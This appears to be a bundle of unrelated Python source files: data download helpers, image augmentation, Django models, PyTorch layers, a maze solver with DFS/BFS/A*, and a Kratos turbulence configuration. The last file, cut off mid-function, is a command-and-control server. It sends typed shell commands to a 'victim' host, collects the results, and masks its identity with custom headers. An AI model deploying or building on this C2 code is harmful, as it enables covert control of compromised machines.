                t.update(len(chunkdata))
config = AutoConfig()
# Local folders (created on first access) for raw data and predictions.
DATA_FOLDER = config.metadata_exitcom.data_folder(cast=ensure_path)
PREDICTIONS_FOLDER = config.metadata_exitcom.predictions_folder(cast=ensure_path)
# URL templates: call with gid=... to produce a concrete download link.
DRIVE_DOWNLOAD_URL = "https://drive.google.com/uc?id={gid}&export=download".format
GSPREADHSEET_DOWNLOAD_URL = (
    "https://docs.google.com/spreadsheets/d/{gid}/export?format=csv&id={gid}".format
)
TRAIN_CSV = DATA_FOLDER / "train.csv"
VALIDATION_CSV = DATA_FOLDER / "validate.csv"
# NOTE(review): VALIDATION_URL is built from test_gid -- confirm the
# validation file is intentionally sourced from the "test" sheet.
TRAIN_URL = DRIVE_DOWNLOAD_URL(gid=config.metadata_exitcom.train_gid())
VALIDATION_URL = DRIVE_DOWNLOAD_URL(gid=config.metadata_exitcom.test_gid())
EXAMPLE_URL = DRIVE_DOWNLOAD_URL(gid=config.metadata_exitcom.example_gid())
EXAMPLE_CSV = PREDICTIONS_FOLDER / "example.csv"
def init_data():
    """Download the train/validation CSVs plus the example predictions file.

    Files that already exist locally are skipped (download_file's default
    override=False behaviour).
    """
    # download data
    data = {TRAIN_CSV: TRAIN_URL, VALIDATION_CSV: VALIDATION_URL}
    for item_path, url in data.items():
        download_file(url, item_path)
    download_file(EXAMPLE_URL, EXAMPLE_CSV)
|
from tensorflow import keras
import numpy as np
import pandas as pd
import cv2
import random
from math import pi
import tensorflow as tf
# import os
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# Training metadata: image paths and their 'Category' labels.
train_samples = pd.read_csv('data/train.csv')
def rotate_images(X_imgs, start_angle, end_angle, n_images):
    """Rotate images to n_images angles evenly spaced in
    [start_angle, end_angle] degrees (TF1 graph-mode).

    NOTE(review): the placeholder X is declared (128, 128, 3) -- a single
    image -- while `radian` is sized len(X_imgs); confirm whether callers are
    expected to pass a batch or one image.
    """
    X_rotate = []
    # Angle increment between consecutive generated rotations.
    iterate_at = (end_angle - start_angle) / (n_images - 1)
    tf.reset_default_graph()
    X = tf.placeholder(tf.float32, shape=(128, 128, 3))
    radian = tf.placeholder(tf.float32, shape=(len(X_imgs)))
    tf_img = tf.contrib.image.rotate(X, radian)
    with tf.Session() as sess:
        sess.run(tf.global_variables_initializer())
        for index in range(n_images):
            degrees_angle = start_angle + index * iterate_at
            radian_value = degrees_angle * pi / 180 # Convert to radian
            radian_arr = [radian_value] * len(X_imgs)
            rotated_imgs = sess.run(tf_img, feed_dict={X: X_imgs, radian: radian_arr})
            X_rotate.append(rotated_imgs)
    X_rotate = np.array(X_rotate, dtype=np.float32)
    print(X_rotate.shape)
    return X_rotate
def flip_images(X_imgs):
    """Return left-right flipped, up-down flipped and transposed variants of
    the input image (TF1 graph-mode).

    NOTE(review): the placeholder is fixed at (128, 128, 3), so this only
    works for 128x128 RGB inputs.
    """
    X_flip = []
    tf.reset_default_graph()
    X = tf.placeholder(tf.float32, shape=(128, 128, 3))
    tf_img1 = tf.image.flip_left_right(X)
    tf_img2 = tf.image.flip_up_down(X)
    tf_img3 = tf.image.transpose_image(X)
    with tf.Session() as sess:
        sess.run(tf.global_variables_initializer())
        flipped_imgs = sess.run([tf_img1, tf_img2, tf_img3], feed_dict={X: X_imgs})
        X_flip.append(flipped_imgs)
    X_flip = np.array(X_flip, dtype=np.float32)
    print(X_flip.shape)
    return X_flip
def add_gaussian_noise(X_imgs):
    """Blend zero-mean Gaussian noise into an image (0.75 image + 0.25 noise
    via cv2.addWeighted) and return a float32 array with the blended copy.

    NOTE(review): the shape unpack `X_imgs[0].shape` treats X_imgs as a batch
    (N, H, W, 3), but callers in this file pass a single (H, W, 3) image --
    confirm the expected input shape.
    """
    gaussian_noise_imgs = []
    row, col, _ = X_imgs[0].shape
    mean = 0
    var = 0.1
    sigma = var ** 0.5
    # BUG FIX: draw actual N(mean, sigma) noise. The original used
    # np.random.random (uniform on [0, 1)) and never applied `sigma`, so the
    # "gaussian" noise was neither Gaussian nor scaled.
    gaussian = np.random.normal(mean, sigma, (row, col, 1)).astype(np.float32)
    gaussian = np.concatenate((gaussian, gaussian, gaussian), axis=2)
    gaussian_img = cv2.addWeighted(X_imgs, 0.75, 0.25 * gaussian, 0.25, mean)
    gaussian_noise_imgs.append(gaussian_img)
    gaussian_noise_imgs = np.array(gaussian_noise_imgs, dtype=np.float32)
    print(gaussian_noise_imgs.shape)
    return gaussian_noise_imgs
def create_training_data(dataset, root_dir, img_size, aug = False ):
    '''
    returns training data [image data, image label]

    dataset  : DataFrame with 'Category' and 'image_path' columns
    root_dir : directory prefix prepended to each image path
    img_size : square resize target (pixels)
    aug      : when True, append rotated/flipped/noised variants of each
               image instead of the plain resized image

    NOTE(review): the augmentation helpers declare fixed 128x128 placeholders
    and index X_imgs[0] as if given a batch, but they are called here with a
    single (img_size, img_size, 3) image -- confirm the expected shapes.
    '''
    training_data = []
    for i in range(len(dataset)):
        class_num = dataset['Category'][i]
        # Some stored paths lack an extension; default to .jpg.
        if dataset['image_path'][i][-4] != '.':
            img_path = root_dir + str(dataset['image_path'][i]) + ".jpg"
        else:
            img_path = root_dir + str(dataset['image_path'][i])
        img_array = cv2.imread(img_path)
        new_array = cv2.resize(img_array, (img_size, img_size))
        if aug:
            print("{}/{} - AUG".format(i, len(dataset)))
            rotated_imgs = rotate_images(new_array, -90, 90, 14)
            for j in range(len(rotated_imgs)):
                training_data.append([rotated_imgs[j], class_num])
            flipped_images = flip_images(new_array)
            for k in range(len(flipped_images)):
                training_data.append([flipped_images[k], class_num])
            gaussian_noise_imgs = add_gaussian_noise(new_array)
            for l in range(len(gaussian_noise_imgs )):
                training_data.append([gaussian_noise_imgs[l], class_num])
        else:
            print("{}/{} - NORM".format(i, len(dataset)))
            training_data.append([new_array, class_num])
    # Shuffle so batches are not ordered by category.
    random.shuffle(training_data)
    X = []
    y = []
    for features, labels in training_data:
        X.append(features)
        y.append(labels)
    X = np.array(X).reshape(-1, img_size, img_size, 3)
    y = np.array(y)
    return X, y
def select_data(dataset):
    """Balance the training set toward max_count rows per category.

    For each of the 58 categories: a category with >= max_count rows is
    downsampled to max_count; a smaller category keeps all of its rows and a
    resampled slice is set aside for augmentation (each augmented image
    yields 18 variants, hence the /18).

    Returns (df_aug, df_no_aug): rows to augment and rows to use as-is.
    """
    max_count = 100
    df_by_categories_aug = []
    df_no_aug = []
    for i in range(58):
        df = dataset.loc[dataset['Category'] == i]
        count = len(df)
        if count == 0:
            # Nothing to keep or augment for an absent category (the
            # original divided by zero here).
            continue
        if count >= max_count:
            df = df.sample(frac=max_count / count).reset_index(drop=True)
            df_no_aug.append(df)
        else:
            df_no_aug.append(df)
            no_of_data_for_augmentation = (max_count - count) / 18
            df_aug = df.sample(frac=no_of_data_for_augmentation / count, replace=True).reset_index(drop=True)
            df_by_categories_aug.append(df_aug)
    df_aug = pd.concat(df_by_categories_aug, ignore_index=True)
    # BUG FIX: the original concatenated df_by_categories_aug a second time
    # here, so df_no_aug was a copy of df_aug and every unaugmented row was
    # silently dropped.
    df_no_aug = pd.concat(df_no_aug, ignore_index=True)
    return df_aug, df_no_aug
# Build the balanced training arrays and persist them to disk.
selected_aug_data, no_aug_data = select_data(train_samples)
# to find number of pictures in each category
# train_samples = train_samples.groupby('Category').nunique()
# print(train_samples)
aug_train_images, aug_train_labels = create_training_data(selected_aug_data, 'data/', 128, aug=True)
normal_train_images, normal_train_labels = create_training_data(no_aug_data, 'data/', 128, aug=False)
train_images = np.concatenate((aug_train_images, normal_train_images))
train_labels = np.concatenate((aug_train_labels, normal_train_labels))
np.save("processed_data/augmented_images.npy", train_images)
np.save("processed_data/augmented_labels.npy", train_labels)
# BUG FIX: the original called len() with no argument (TypeError); report the
# final training-set size instead.
print(len(train_images))
# test_images, test_itemid = create_training_data(test_samples, 'data/', 128)
# np.save("processed_data/test_image_2.npy", test_images, allow_pickle=True)
# np.save("processed_data/test_itemid_2.npy", test_itemid, allow_pickle=True)
|
import uuid
from django.contrib.gis.db import models
from django.contrib.gis.geos import Point
class Hospital(models.Model):
    """A hospital with contact details and a PostGIS point kept in sync
    with the scalar lng/lat fields by save()."""
    hospital_uuid = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
    name = models.TextField()
    address = models.TextField()
    phone = models.TextField()
    opening_hours = models.TextField()
    lng = models.FloatField()
    lat = models.FloatField()
    # WGS84 (srid=4326) geography point; overwritten on every save.
    location = models.PointField(geography=True, srid=4326, default='POINT(0.0 0.0)')
    def __str__(self):
        return str(self.hospital_uuid)
    def save(self, **kwargs):
        # Rebuild the geo point from lng/lat so callers only maintain the
        # scalar coordinate fields.
        self.location = Point(float(self.lng), float(self.lat))
        super(Hospital, self).save(**kwargs)
|
from maya import cmds as mc
from ..common import fk
class TongueComponent(fk):
    """FK rig component specialised for a tongue: each control is reoriented,
    stretched, and tied to a shared visibility attribute."""
    def __init__(self, side, name, joints, parent, visibilityAttr):
        # Stored before the base __init__ runs -- presumably the base class
        # triggers build(), which reads this attribute (confirm in `fk`).
        self.visibilityAttr = visibilityAttr
        super(TongueComponent, self).__init__(side, name, joints, parent)
    def build(self, side, name, joints, parent):
        """Build the FK controls, then reshape their CVs and wire visibility."""
        super(TongueComponent, self).build(side, name, joints, parent)
        for ctl in self.controls:
            # Rotate/scale the control CVs to lie flat along the tongue.
            mc.rotate(0, 90, 0, ctl + ".cv[*]")
            mc.scale(1, 1.5, 3.5, ctl + ".cv[*]")
            mc.connectAttr(self.visibilityAttr, ctl + ".v")
|
# Generated by Django 2.0 on 2018-10-01 09:58
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration: alters Registration.roll to a 5-character
    # CharField. Generated migrations should not be hand-edited.
    dependencies = [
        ('mili', '0004_auto_20181001_0958'),
    ]
    operations = [
        migrations.AlterField(
            model_name='registration',
            name='roll',
            field=models.CharField(max_length=5),
        ),
    ]
|
from typing import Callable, Optional
import torch
from torch import nn
class NonLinear(nn.Module):
    """A Linear layer with an optional activation applied to its output."""

    def __init__(self,
                 in_features: int,
                 out_features: int,
                 activation: Optional[Callable] = None,
                 init_func: Optional[Callable] = None) -> None:
        super(NonLinear, self).__init__()
        self._linear = nn.Linear(in_features, out_features)
        self._activation = activation
        self.reset_parameters(init_func=init_func)

    def reset_parameters(self, init_func: Optional[Callable] = None) -> None:
        """Apply `init_func` (if given) in place to the linear weight."""
        if init_func:
            init_func(self._linear.weight)

    def forward(self, x):
        projected = self._linear(x)
        return self._activation(projected) if self._activation else projected
class BiLSTM(nn.Module):
    """Bidirectional LSTM over packed padded sequences.

    forward() packs `inputs` by `seq_lens`, runs the LSTM, and unpads back to
    a tensor of shape (batch, max_seq_len, 2 * hidden_size) when
    `batch_first` is True.
    """

    def __init__(self,
                 input_size: int,
                 hidden_size: int,
                 num_layers: int = 1,
                 batch_first: bool = True,
                 dropout: float = 0,
                 init_func: Optional[Callable] = None) -> None:
        super(BiLSTM, self).__init__()
        # BUG FIX: honour the `batch_first` argument -- it was hard-coded to
        # True in the nn.LSTM constructor.
        self._lstm = nn.LSTM(input_size=input_size,
                             hidden_size=hidden_size,
                             num_layers=num_layers,
                             batch_first=batch_first,
                             bidirectional=True,
                             dropout=dropout)
        self.batch_first = batch_first
        self.reset_parameters(init_func=init_func)

    def reset_parameters(self, init_func: Optional[Callable] = None) -> None:
        """Apply `init_func` in place to every LSTM weight matrix.

        BUG FIX: nn.LSTM has no `.weight` attribute (its parameters are named
        weight_ih_l0, weight_hh_l0, ...), so the original raised
        AttributeError whenever an init_func was supplied.
        """
        if init_func:
            for name, param in self._lstm.named_parameters():
                if name.startswith("weight"):
                    init_func(param)

    def forward(self, inputs: torch.Tensor, seq_lens: torch.Tensor):
        seq_packed = torch.nn.utils.rnn.pack_padded_sequence(inputs, seq_lens, batch_first=self.batch_first)
        lstm_output, hidden = self._lstm(seq_packed)  # packed: (*, hidden_size * num_directions)
        # seq_unpacked: (batch, max seq len in batch, hidden_size * num_directions)
        seq_unpacked, _ = torch.nn.utils.rnn.pad_packed_sequence(lstm_output, batch_first=self.batch_first)
        return seq_unpacked, hidden
class Biaffine(nn.Module):
    """Biaffine transform scoring every pair (input1[i], input2[j]).

    A single Linear projects input1 from in1_features to
    out_features * in2_features; a batched matmul with input2 then yields
    scores of shape (batch, len2, len1, out_features).
    """

    def __init__(self,
                 in1_features: int,
                 in2_features: int,
                 out_features: int,
                 init_func: Optional[Callable] = None) -> None:
        super(Biaffine, self).__init__()
        self.in1_features = in1_features
        self.in2_features = in2_features
        self.out_features = out_features
        self.linear_in_features = in1_features
        self.linear_out_features = out_features * in2_features
        # nn.Linear keeps its default bias.
        self._linear = nn.Linear(in_features=self.linear_in_features,
                                 out_features=self.linear_out_features)
        self.reset_parameters(init_func=init_func)

    def reset_parameters(self, init_func: Optional[Callable] = None) -> None:
        """Apply `init_func` (if given) in place to the projection weight."""
        if init_func:
            init_func(self._linear.weight)

    def forward(self, input1: torch.Tensor, input2: torch.Tensor):
        batch_size, len1, _ = input1.size()
        _, len2, dim2 = input2.size()
        # Fold the out_features axis into the length axis so one bmm computes
        # all pairwise bilinear scores at once.
        projected = self._linear(input1).view(batch_size, len1 * self.out_features, dim2)
        scores = torch.transpose(torch.bmm(projected, torch.transpose(input2, 1, 2)), 1, 2)
        return scores.contiguous().view(batch_size, len2, len1, self.out_features)
|
import re
import unicodedata
from django import template
register = template.Library()
# Year of the most recent national census per supported country
# (lower-case country names as keys).
CENSUS = {
    'tanzania': '2012',
    'kenya': '2009',
    'nigeria': '2006',
    'senegal': '2013',
    'ethiopia': '2007',
    'south africa': '2011',
}
# Local name of the first-level administrative division per country.
LEVEL1_NAMES = {
    'tanzania': 'Region',
    'kenya': 'County',
    'nigeria': 'State',
    'senegal': 'Region',
    'ethiopia': 'Region',
    'south africa': 'Province'
}
@register.filter
def census_year(country):
    """Template filter: census year for `country`, or 'Unknown'."""
    key = country.lower()
    return CENSUS.get(key, 'Unknown')
@register.filter
def geo_level(geo):
    """Template filter: human-readable admin-level name for a geo dict.

    'level1' maps to a country-specific name (Region/County/State/...);
    any other level is simply title-cased.
    """
    current_geo = geo.get('this')
    if current_geo.get('geo_level') != 'level1':
        return current_geo['geo_level'].title()
    try:
        country_name = geo['parents']['country']['short_name']
    except KeyError:
        return 'Level1'
    return LEVEL1_NAMES.get(country_name.lower(), 'Level1')
@register.filter
def underscore_slugify(value):
    """Slugify with underscores: drop non-word characters, lower-case, and
    collapse runs of spaces/hyphens into single underscores."""
    cleaned = re.sub(r'[^\w\s-]', '', str(value)).strip().lower()
    return re.sub(r'[-\s]+', '_', cleaned)
|
from enum import Enum
from typing import List, NamedTuple, Callable, Optional
import random
from math import sqrt
from core.maze.generic_search import dfs, bfs, astar,node_to_path, Node
import time
import timeit
'''
Serão ilustrados os problemas de busca em profundidade e busca em largura em um labirinto
O Labirinto é bidimensional, em forma de uma caixa ou grade
'''
'''
Aqui a classe Cell é uma célula do labirinto.
A reprentação é feita por um enum de strings.
Vazio (“ “), bloqueado (“X”), início (“S”), chegada (“G”)
e caminho (“*”) são as opções, traduzidas do inglês.
'''
class Cell(str, Enum):
    """Maze cell contents, each rendered as a single character."""
    EMPTY = " "    # walkable cell
    BLOCKED = "X"  # wall
    START = "S"
    GOAL = "G"
    PATH = "*"     # part of a found solution path
'''
MazeLocation é uma classe que recebe uma tupla composta por
linha (row) e coluna (column), uma coordenada que
representa um lugar específico no labirinto gerado.
Representação de um local no labirinto
'''
class MazeLocation(NamedTuple):
    """A (row, column) position within the maze grid."""
    row: int
    column: int
#Aqui o labirinto é inicializado com (__init__), construtor
class Maze:
    """A 2-D grid maze with randomly placed walls.

    The grid holds rows x columns Cell values; `sparseness` is the
    probability that any given cell becomes a wall (BLOCKED).
    """

    def __init__(
        self,
        rows: int = 10,
        columns: int = 10,
        sparseness: float = 0.2,
        start: MazeLocation = MazeLocation(0, 0),
        goal: MazeLocation = MazeLocation(9, 9),
    ) -> None:
        # Basic instance state.
        self._rows: int = rows
        self._columns: int = columns
        self.start: MazeLocation = start
        self.goal: MazeLocation = goal
        # Begin with an all-EMPTY grid, then sprinkle walls into it.
        self._grid: List[List[Cell]] = [
            [Cell.EMPTY for c in range(columns)] for r in range(rows)
        ]
        self._randomly_fill(rows, columns, sparseness)
        # Stamp start and goal last so walls can never cover them.
        self._grid[start.row][start.column] = Cell.START
        self._grid[goal.row][goal.column] = Cell.GOAL

    def _randomly_fill(self, rows: int, columns: int, sparseness: float):
        """Turn each cell into a wall with probability `sparseness`."""
        for row in range(rows):
            for column in range(columns):
                if random.uniform(0, 1.0) < sparseness:
                    self._grid[row][column] = Cell.BLOCKED

    def __str__(self) -> str:
        """Render the maze, one text line per grid row."""
        return "".join(
            "".join(cell.value for cell in grid_row) + "\n"
            for grid_row in self._grid
        )

    def goal_test(self, ml: MazeLocation) -> bool:
        """True when `ml` is the goal cell."""
        return ml == self.goal

    def successors(self, ml: MazeLocation) -> List[MazeLocation]:
        """Reachable neighbours of `ml` in the order down, up, right, left,
        skipping walls and positions outside the grid."""
        locations: List[MazeLocation] = []
        row, column = ml.row, ml.column
        if row + 1 < self._rows and self._grid[row + 1][column] != Cell.BLOCKED:
            locations.append(MazeLocation(row + 1, column))
        if row - 1 >= 0 and self._grid[row - 1][column] != Cell.BLOCKED:
            locations.append(MazeLocation(row - 1, column))
        if column + 1 < self._columns and self._grid[row][column + 1] != Cell.BLOCKED:
            locations.append(MazeLocation(row, column + 1))
        if column - 1 >= 0 and self._grid[row][column - 1] != Cell.BLOCKED:
            locations.append(MazeLocation(row, column - 1))
        return locations

    def mark(self, path: List[MazeLocation]):
        """Draw `path` with PATH markers, re-stamping start and goal."""
        for maze_location in path:
            self._grid[maze_location.row][maze_location.column] = Cell.PATH
        self._grid[self.start.row][self.start.column] = Cell.START
        self._grid[self.goal.row][self.goal.column] = Cell.GOAL

    def clear(self, path: List[MazeLocation]):
        """Erase a previously marked `path` so another search can be drawn."""
        for maze_location in path:
            self._grid[maze_location.row][maze_location.column] = Cell.EMPTY
        self._grid[self.start.row][self.start.column] = Cell.START
        self._grid[self.goal.row][self.goal.column] = Cell.GOAL
def manhattan_distance(goal: MazeLocation) -> Callable[[MazeLocation], float]:
    """Return a heuristic h(ml) = |column delta| + |row delta| to `goal`,
    suitable for A* on a 4-connected grid."""
    def distance(ml: MazeLocation) -> float:
        # BUG FIX: removed a leftover debug print(ml) that fired on every A*
        # node expansion (plus a block of commented-out debug prints).
        xdist: int = abs(ml.column - goal.column)
        ydist: int = abs(ml.row - goal.row)
        return (xdist + ydist)
    return distance
'''if __name__ == "__main__":
# gera labirinto e escreve
m: Maze = Maze()
print("LABIRINTO GERADO")
print(m)
# test DFS
inicio = timeit.default_timer()
solution1: Optional[Node[MazeLocation]] = dfs(m.start, m.goal_test, m.successors)
fim = timeit.default_timer()
if solution1 is None:
print("Sem solução para a depth-first search!")
else:
path1: List[MazeLocation] = node_to_path(solution1)
m.mark(path1)
print("SOLUÇÃO COM DFS")
print(m)
m.clear(path1)
print('tempo de execução da DFS: %f' % (fim - inicio))
# test BFS
inicio = timeit.default_timer()
solution2: Optional[Node[MazeLocation]] = bfs(m.start, m.goal_test, m.successors)
fim = timeit.default_timer()
if solution2 is None:
print("Sem solução para a breadth-first search!")
else:
path2: List[MazeLocation] = node_to_path(solution2)
m.mark(path2)
print("SOLUÇÃO COM BFS")
print(m)
m.clear(path2)
print('tempo de execução da BFS: %f' % (fim - inicio))
'''
def runWeb():
    """Generate a maze, solve it with DFS, BFS and A*, and return a dict of
    grid snapshots and timings for the web page.

    Keys: 'original', then per algorithm ('dfs'/'bfs'/'astar') a grid
    snapshot (or None when unsolvable) and a '<name>_temp' elapsed time.
    """
    # Dictionary holding everything that goes to the web page.
    labirintoDados = {}
    # Generate the maze and snapshot the unsolved grid.
    m: Maze = Maze()
    labirintoDados['original'] = percorreAlgoritimo(m)
    # Depth-first search, timed.
    inicio = timeit.default_timer()
    solution1: Optional[Node[MazeLocation]] = dfs(m.start, m.goal_test, m.successors)
    #print(dir(solution1.state))
    fim = timeit.default_timer()
    if solution1 is None:
        labirintoDados['dfs'] = None
        #print("Sem solução para a depth-first search!")
    else:
        path1: List[MazeLocation] = node_to_path(solution1)
        m.mark(path1)
        #print("SOLUÇÃO COM DFS")
        #print(m)
        labirintoDados['dfs'] = percorreAlgoritimo(m)
        labirintoDados['dfs_temp'] = fim - inicio
        # Clear the path so the next search draws on a clean grid.
        m.clear(path1)
        #m.clear(path_teste)
        #print('tempo de execução da DFS: %f' % (fim - inicio))
    # Breadth-first search, timed.
    inicio = timeit.default_timer()
    solution2: Optional[Node[MazeLocation]] = bfs(m.start, m.goal_test, m.successors)
    fim = timeit.default_timer()
    if solution2 is None:
        labirintoDados['bfs'] = None
        #print("Sem solução para a breadth-first search!")
    else:
        path2: List[MazeLocation] = node_to_path(solution2)
        m.mark(path2)
        #print("SOLUÇÃO COM BFS")
        #print(m)
        labirintoDados['bfs'] = percorreAlgoritimo(m)
        labirintoDados['bfs_temp'] = fim - inicio
        m.clear(path2)
        #print('tempo de execução da BFS: %f' % (fim - inicio))
    # A* with a Manhattan-distance heuristic, timed.
    distance: Callable[[MazeLocation], float] = manhattan_distance(m.goal)
    inicio = timeit.default_timer()
    solution3: Optional[Node[MazeLocation]] = astar(m.start, m.goal_test, m.successors, distance)
    fim = timeit.default_timer()
    if solution3 is None:
        labirintoDados['astar'] = None
        #print("Sem solução para a breadth-first search!")
    else:
        path3: List[MazeLocation] = node_to_path(solution3)
        m.mark(path3)
        #print("SOLUÇÃO COM BFS")
        #print(m)
        labirintoDados['astar'] = percorreAlgoritimo(m)
        labirintoDados['astar_temp'] = fim - inicio
        m.clear(path3)
        #print('tempo de execução da BFS: %f' % (fim - inicio))
    return labirintoDados
#Percorre todo o algoritimo para criar uma cópia da matriz do labirinto
def percorreAlgoritimo(m):
    """Snapshot a maze's grid as a plain list-of-lists of single characters.

    Only the five known cell glyphs are copied; any other value is skipped.
    """
    snapshot = []
    for grid_row in m._grid:
        row_chars = []
        for cell in grid_row:
            glyph = cell[0]
            if glyph in (" ", "X", "S", "G", "*"):
                row_chars.append(glyph)
        snapshot.append(row_chars)
    return snapshot
|
from django.db import models
from django_countries.fields import CountryField
class StudentModel(models.Model):
    """A student record with demographics, free-form remarks and audit
    timestamps. (Removed a stray "|" extraction artifact that trailed the
    __str__ return statement.)"""
    name = models.CharField(max_length=50)
    age = models.IntegerField()
    gender = models.CharField(max_length=50)
    #skills = models.ManyToManyField()
    country = CountryField()
    remarks = models.CharField(max_length=1000)
    created_at = models.DateTimeField(auto_now_add=True)  # set once on insert
    updated_at = models.DateTimeField(auto_now=True)      # refreshed on save
    isactive = models.BooleanField(default=False)
    def __str__(self):
        return self.name
from __future__ import print_function, absolute_import, division
import KratosMultiphysics as Kratos
import KratosMultiphysics.RANSApplication as KratosRANS
from KratosMultiphysics.RANSApplication.adjoint_turbulence_eddy_viscosity_model_configuration import AdjointTurbulenceEddyViscosityModelConfiguration
class AdjointTurbulenceKEpsilonConfiguration(
        AdjointTurbulenceEddyViscosityModelConfiguration):
    """Adjoint configuration for the k-epsilon eddy-viscosity turbulence model.

    Validates the user-supplied "model_settings", pushes the turbulence
    constants into the fluid model part's ProcessInfo, and declares the
    adjoint element/condition names plus the nodal variables and DOFs the
    adjoint solver needs.
    """

    def __init__(self, model, parameters):
        super(AdjointTurbulenceKEpsilonConfiguration, self).__init__(
            model, parameters)
        # Defaults for every supported constant; ValidateAndAssignDefaults
        # fills missing entries and rejects unknown keys.
        default_settings = Kratos.Parameters(r'''{
            "echo_level"       :0,
            "constants":
            {
                "wall_smoothness_beta"    : 5.2,
                "von_karman"              : 0.41,
                "c_mu"                    : 0.09,
                "c1"                      : 1.44,
                "c2"                      : 1.92,
                "sigma_k"                 : 1.0,
                "sigma_epsilon"           : 1.3,
                "bossak_alpha"            : 1.0
            }
        }''')
        parameters["model_settings"].ValidateAndAssignDefaults(
            default_settings)
        self.model_settings = parameters["model_settings"]
        # Names looked up by the adjoint solver when building the system.
        self.element_name = "RansEvmMonolithicKEpsilonVMSAdjoint"
        self.condition_name = "RansEvmMonolithicKEpsilonVMSAdjointWallCondition"

    def InitializeModelConstants(self):
        # reading constants from the validated settings into ProcessInfo
        constants = self.model_settings["constants"]
        self.fluid_model_part.ProcessInfo[KratosRANS.WALL_SMOOTHNESS_BETA] = constants["wall_smoothness_beta"].GetDouble()
        self.fluid_model_part.ProcessInfo[KratosRANS.WALL_VON_KARMAN] = constants["von_karman"].GetDouble()
        self.fluid_model_part.ProcessInfo[KratosRANS.TURBULENCE_RANS_C_MU] = constants["c_mu"].GetDouble()
        self.fluid_model_part.ProcessInfo[KratosRANS.TURBULENCE_RANS_C1] = constants["c1"].GetDouble()
        self.fluid_model_part.ProcessInfo[KratosRANS.TURBULENCE_RANS_C2] = constants["c2"].GetDouble()
        self.fluid_model_part.ProcessInfo[KratosRANS.TURBULENT_KINETIC_ENERGY_SIGMA] = constants["sigma_k"].GetDouble()
        self.fluid_model_part.ProcessInfo[KratosRANS.TURBULENT_ENERGY_DISSIPATION_RATE_SIGMA] = constants["sigma_epsilon"].GetDouble()
        self.fluid_model_part.ProcessInfo[KratosRANS.IS_CO_SOLVING_PROCESS_ACTIVE] = True
        self.fluid_model_part.ProcessInfo[Kratos.BOSSAK_ALPHA] = constants["bossak_alpha"].GetDouble()
        Kratos.Logger.PrintInfo(
            self.__class__.__name__,
            "All adjoint turbulence solution strategies are created.")

    def AddVariables(self):
        # adding k-epsilon specific variables (primal + adjoint scalars)
        self.fluid_model_part.AddNodalSolutionStepVariable(KratosRANS.TURBULENT_KINETIC_ENERGY)
        self.fluid_model_part.AddNodalSolutionStepVariable(KratosRANS.TURBULENT_KINETIC_ENERGY_RATE)
        self.fluid_model_part.AddNodalSolutionStepVariable(KratosRANS.TURBULENT_ENERGY_DISSIPATION_RATE)
        self.fluid_model_part.AddNodalSolutionStepVariable(KratosRANS.TURBULENT_ENERGY_DISSIPATION_RATE_2)
        self.fluid_model_part.AddNodalSolutionStepVariable(KratosRANS.RANS_AUXILIARY_VARIABLE_1)
        self.fluid_model_part.AddNodalSolutionStepVariable(KratosRANS.RANS_AUXILIARY_VARIABLE_2)
        self.fluid_model_part.AddNodalSolutionStepVariable(KratosRANS.RANS_SCALAR_1_ADJOINT_1)
        self.fluid_model_part.AddNodalSolutionStepVariable(KratosRANS.RANS_SCALAR_1_ADJOINT_2)
        self.fluid_model_part.AddNodalSolutionStepVariable(KratosRANS.RANS_SCALAR_1_ADJOINT_3)
        self.fluid_model_part.AddNodalSolutionStepVariable(KratosRANS.RANS_AUX_ADJOINT_SCALAR_1)
        self.fluid_model_part.AddNodalSolutionStepVariable(KratosRANS.RANS_SCALAR_2_ADJOINT_1)
        self.fluid_model_part.AddNodalSolutionStepVariable(KratosRANS.RANS_SCALAR_2_ADJOINT_2)
        self.fluid_model_part.AddNodalSolutionStepVariable(KratosRANS.RANS_SCALAR_2_ADJOINT_3)
        self.fluid_model_part.AddNodalSolutionStepVariable(KratosRANS.RANS_AUX_ADJOINT_SCALAR_2)
        super(AdjointTurbulenceKEpsilonConfiguration, self).AddVariables()

    def AddDofs(self):
        # Only the first adjoint scalar of each equation carries a DOF.
        Kratos.VariableUtils().AddDof(KratosRANS.RANS_SCALAR_1_ADJOINT_1, self.fluid_model_part)
        Kratos.VariableUtils().AddDof(KratosRANS.RANS_SCALAR_2_ADJOINT_1, self.fluid_model_part)
        Kratos.Logger.PrintInfo(self.__class__.__name__,
                                "DOFs added successfully.")

    def Initialize(self):
        self.InitializeModelConstants()

    def GetAdjointElementName(self):
        return self.element_name

    def GetAdjointConditionName(self):
        return self.condition_name

    def Check(self):
        # No additional checks beyond the base configuration.
        pass

    def InitializeSolutionStep(self):
        pass

    def FinalizeSolutionStep(self):
        pass
|
from http.server import *
import random, string, ssl
"""
this is used to generate random session cookie value.
"""
# Alphanumeric alphabet for the fake session cookie value.
chars = string.ascii_letters + string.digits
# One 20-character random value per server run.
session_value = ''.join(random.choices(chars, k=20))
"""
c2server class has accepts two HTTP methods.
1. GET : This method is used to send command to the compromised host
2. POST : This method is used to receive results of the command executed.
"""
class c2Server(BaseHTTPRequestHandler):
    """Request handler: GET hands a command to the caller, POST receives
    the command's output back."""

    def set_headers(self):
        """
        set_headers can be used to set custom HTTP headers. This helps mask
        the identity of the c2 server.
        """
        self.send_response(200, "ok")
        self.send_header('Content-type', 'text/html')
        # NOTE(review): this sends the bare random value, not a
        # "name=value" pair, so it is not a well-formed cookie --
        # confirm the client expects exactly this string.
        self.send_header('Set-Cookie', session_value)
        self.end_headers()

    # Allow GET
    def do_GET(self):
        self.set_headers()
        """
        message variable is the command being sent to victim node. For the purpose of this
        demo it is being entered manually. But it can be stored in a database and
        retrieved later when victim calls back for task. A use case can be found in
        https://github.com/madhavbhatt/Web-Based-Command-Control/blob/master/c2.py
        """
        message = input("$ ") # command typed by the operator
        self.wfile.write(message.encode('utf-8'))

    # Allow POST
    def do_POST(self):
        # self.set_headers()
        print("data received from " + str(self.client_address[0]))
        """
        self.client_address[0] is the IP address of calling victim. In the POST request,
        host would send content-length of the data sent via POST. Which is further used
        to isolate the data from request.
        """
        content_length = int(self.headers['Content-Length'])
        post_data = self.rfile.read(content_length)
        data = post_data.decode('utf-8') # result of command execution
        print(data)
def runC2server():
    """Start the TLS-wrapped listener on port 443 and serve forever."""
    server_address = ('', 443)  # start listening on 443, all interfaces
    httpd = HTTPServer(server_address, c2Server)
    # ssl.wrap_socket() was deprecated in Python 3.7 and removed in 3.12;
